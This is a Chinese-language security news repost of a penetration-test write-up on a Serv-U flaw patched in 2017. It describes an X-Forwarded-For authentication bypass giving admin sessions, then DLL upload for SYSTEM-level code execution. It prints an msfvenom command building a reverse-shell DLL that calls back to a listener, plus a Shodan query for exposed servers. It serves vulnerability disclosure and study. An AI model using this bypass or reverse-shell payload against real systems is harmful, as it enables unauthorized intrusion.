當前位置:
首頁 > 新聞 > 看我如何在滲透測試過程中發現並利用Serv-U漏洞進行操作系統提權

看我如何在滲透測試過程中發現並利用Serv-U漏洞進行操作系統提權

最近,我在做一個外網滲透測試的過程中,發現了SolarWinds文件共享程序Serv-U的一個漏洞,通過該漏洞我獲得了Serv-U的管理許可權,並能以系統用戶身份執行遠程代碼,成功完成操作系統提權。


在此,我在Win7虛擬機中安裝Serv-U程序,對該漏洞作出驗證。





前期發現


Serv-U安裝之後,不需要進行任何配置,其默認的Web服務埠為127.0.0.1,由於是本地伺服器地址,即使提供外部服務也不需要更改此IP。



基於這個Web服務端,我利用Burp Suite的Spider功能來發現了其/?Command=Login請求點可能存在問題,之後,繼續利用Burp Suite的Scanner功能,用包含X-Forwarded-For頭的POST請求對該點發起fuzz攻擊,來觀察其響應結果。沒過一會,通過對這些響應信息的手工驗證後發現,當提交的登錄請求中包含了X-Forwarded-For頭為127.0.0.1的POST請求信息時,Serv-U程序將以本地管理員身份響應一個有效的Session會話。




雖然該POST請求通過Firefox瀏覽器會產生一個如下的錯誤提示:



但其本地管理員身份的Session會話卻是有效的,利用該Cookie構造GET請求:




可以順利以管理員身份登錄Serv-U管理後台:




進一步利用


經過一番研究發現,攻擊者可以利用http://127.0.0.1:43958/Admin/ServerLimits.htm頁面下的集成庫文件導入功能(intergration library),上傳並執行任意DLL文件:



這裡,我用msfvenom來製作免殺的惡意DLL文件MFC100PWN.dll,如下:



root@6c656f:~# msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.101 LPORT=8443 -f dll > MFC100PWN.dllNo platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 1810 bytes Final size of dll file: 5120 bytes root@6c656f:~# file MFC100PWN.dllMFC100PWN.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows





該DLL文件將會向192.168.1.101:8443執行反彈連接,所以,這裡用Metasploit開啟一個監聽端listener。




操作系統提權



把MFC100PWN.dll文件通過Serv-u web client上傳至 目錄」C:Program FilesRhinoSoftServ-U」:




執行該DLL文件:


不出意外,通過該DLL文件的反彈shell,我們獲得了Serv-u所在系統的管理員許可權。




漏洞影響


至2017年1月30日,通過Shodan查詢,可以發現全球聯網的,安裝有類似Serv-U服務的15,000多台伺服器都面臨此漏洞威脅,而據我們研究發現,Serv-U在15.1.5之前的所有版本都受此漏洞影響。(具體漏洞信息參考此聲明)



Server: Serv-U/ product:"Rhinosoft Serv-U httpd"



漏洞報告進程


01/13/2017 – 向SolarWind披露漏洞

02/17/2017 – SolarWind發布補丁


03/22/2017 – 公開漏洞


*參考來源:SpiderLabs,freebuf小編clouds編譯,轉載請註明來自Freebuf.com。



喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 FreeBuf 的精彩文章:

【推廣】管理層視點 | 行業洞察驅動安全防禦,嚴峻安全挑戰迎刃而解
IOS 10.3.1修復的那個WiFi晶元漏洞,也影響到了數百萬Android手機
基於Wifipineapple對無線安全情況的綜合性調查與研究
【思路分享】如何在Win下查殺Linux惡意文件

TAG:FreeBuf |

您可能感興趣

挖洞經驗 | 看我如何利用上傳漏洞在PayPal伺服器上實現RCE執行
繞過Google驗證限制,對搜索結果進行批量化漏洞掃描
挖洞經驗 | 看我如何利用SAML漏洞實現Uber內部聊天系統未授權登錄
滲透測試中利用基於時間差反饋的遠程代碼執行漏洞(Timed Based RCE)進行數據獲取
Windows Lnk遠程代碼執行漏洞利用測試
研究發現有加密貨幣殭屍伺服器在WannaCry蠕蟲前利用微軟漏洞
如何使用加密的Payload來識別並利用SQL注入漏洞
挖洞經驗 | 看我如何綜合利用4個漏洞實現GitHub Enterprise 遠程代碼執行
如何使用加密的Payload來識別並利用SQL注入漏洞?
WordPress又曝漏洞:REST API由於許可權控制失效致內容注入
Linux現嚴重漏洞,僅靠惡意DNS響應就能實施遠程攻擊
我們要在任何可能的地方測試XSS漏洞
Kerberos現漏洞,多操作系統受影響
iPhone操作系統存保安漏洞 蘋果吁更新系統
NTP漏洞可致Windows系統觸發DoS
聯想ThinkPad系列曝安全漏洞 已被官方證實
iOS內核漏洞利用PoC——zIVA
藉助DNS解析來檢測Java反序列化漏洞
微軟被曝Windows最新漏洞:極其糟糕!現漏洞詳情已發布